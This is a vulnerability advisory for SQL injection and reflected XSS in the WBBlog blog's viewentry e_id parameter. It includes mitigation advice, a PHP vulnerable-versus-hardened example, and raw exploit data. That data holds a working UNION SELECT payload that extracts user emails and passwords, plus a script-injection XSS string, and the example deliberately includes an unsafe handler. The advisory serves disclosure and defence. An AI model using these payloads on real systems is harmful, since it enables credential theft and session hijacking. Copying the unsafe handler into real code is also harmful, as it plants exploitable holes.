Vendor: WBBlog
Author: xoron
CVSS: 5.5 (MEDIUM)
Category: XSS/SQL Injection
CWE: 89
Product Name: WBBlog
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

The WBBlog application is vulnerable to both XSS and SQL injection. The SQL injection is reachable through a specially crafted request to index.php, where the 'e_id' parameter of the viewentry command is placed into a database query without validation, allowing an attacker to execute arbitrary SQL statements against the backend database. The XSS is reachable through the same 'e_id' parameter of the viewentry page, which is reflected back into the HTML response without encoding; injected script there can lead to session hijacking or defacement of the website.

Mitigation:

To mitigate the XSS vulnerability, input should be validated and every reflected value should be HTML-encoded on output so that injected markup is rendered as text rather than executed as script. To mitigate the SQL injection vulnerability, prepared statements or parameterized queries should be used so that user input reaches the database as bound data rather than as part of the query text, with the input additionally validated (e_id should only ever be an integer).
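As an added illustration (not WBBlog's code, which does not appear on this page), the following PHP shows a hypothetical viewentry handler with the two defects the advisory describes, side by side with a hardened version that applies the mitigations above: integer validation of e_id, a PDO prepared statement, and HTML encoding of everything reflected into the page. The table and column names (entry, e_id, e_title, e_body), the function names and the in-memory SQLite sample data are assumptions made for the example.

```php
<?php
// Added example, not WBBlog's code: a hypothetical viewentry handler shaped
// like the flaw the advisory describes (e_id spliced into SQL and echoed back
// unescaped), followed by a hardened version. Schema names are assumptions.

declare(strict_types=1);

// --- Vulnerable shape (assumed, shown for contrast; never called below) ----
function viewEntryVulnerable(PDO $db, array $get): string
{
    $eId = $get['e_id'] ?? '';
    // Untrusted input becomes part of the query text: SQL injection.
    $row = $db->query("SELECT e_title, e_body FROM entry WHERE e_id=" . $eId)
              ->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        // Input reflected into HTML without encoding: reflected XSS.
        return "<p>No entry with id " . $eId . "</p>";
    }
    return "<h1>" . $row['e_title'] . "</h1><div>" . $row['e_body'] . "</div>";
}

// --- Hardened version -----------------------------------------------------
function esc(string $s): string
{
    // Encode for an HTML body context; ENT_QUOTES also covers attribute values.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function viewEntryHardened(PDO $db, array $get): string
{
    // 1. Validate: e_id must be a positive integer. Anything else is rejected
    //    before it reaches SQL or HTML, so a UNION payload never gets that far.
    $eId = filter_var($get['e_id'] ?? null, FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 1]]);
    if ($eId === false) {
        http_response_code(400);
        return '<p>Invalid entry id.</p>';
    }

    // 2. Parameterize: the id travels as a bound value, never as query text,
    //    so the caller cannot alter the structure of the statement.
    $stmt = $db->prepare('SELECT e_title, e_body FROM entry WHERE e_id = :id');
    $stmt->bindValue(':id', $eId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false) {
        http_response_code(404);
        // 3. Encode on output: even an already-validated value is escaped.
        return '<p>No entry with id ' . esc((string) $eId) . '</p>';
    }
    // Stored fields are escaped too. A blog that intentionally stores HTML in
    // e_body would need an HTML sanitizer here instead of plain escaping.
    return '<h1>' . esc($row['e_title']) . '</h1>'
         . '<div>' . esc($row['e_body']) . '</div>';
}

// Self-contained demo on an in-memory SQLite database (constructed sample data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE entry (e_id INTEGER PRIMARY KEY, e_title TEXT, e_body TEXT)');
$db->exec("INSERT INTO entry VALUES (1, 'First post', 'Hello <b>world</b>')");

echo viewEntryHardened($db, ['e_id' => '1']), "\n";                   // renders entry 1
echo viewEntryHardened($db, ['e_id' => '2']), "\n";                   // 404, id echoed safely
echo viewEntryHardened($db, ['e_id' => 'abc"><b>']), "\n";            // rejected, 400
echo viewEntryHardened($db, ['e_id' => '-1 UNION SELECT null']), "\n"; // rejected, 400
```

Run it with `php viewentry_example.php` (the file name is arbitrary) against any PHP build with the pdo_sqlite extension. The validation step alone would stop both requests shown in the raw advisory, but the prepared statement and output encoding are kept regardless, since each guards a different trust boundary: the query and the rendered page.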

Exploit-DB raw data:

======================x=o=r=o=n=====================

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

======================x=o=r=o=n=====================

Found by: xoron

xoron.biz

======================x=o=r=o=n=====================

SQL INJ:

index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*

XSS :

index.php?cmd=viewentry&e_id="><script>alert('HACKED')</script>

======================x=o=r=o=n=====================

Vendor Site: http://liqua.com/wbblog.html

======================x=o=r=o=n=====================

Thnx: pang0

======================x=o=r=o=n=====================

# milw0rm.com [2007-03-15]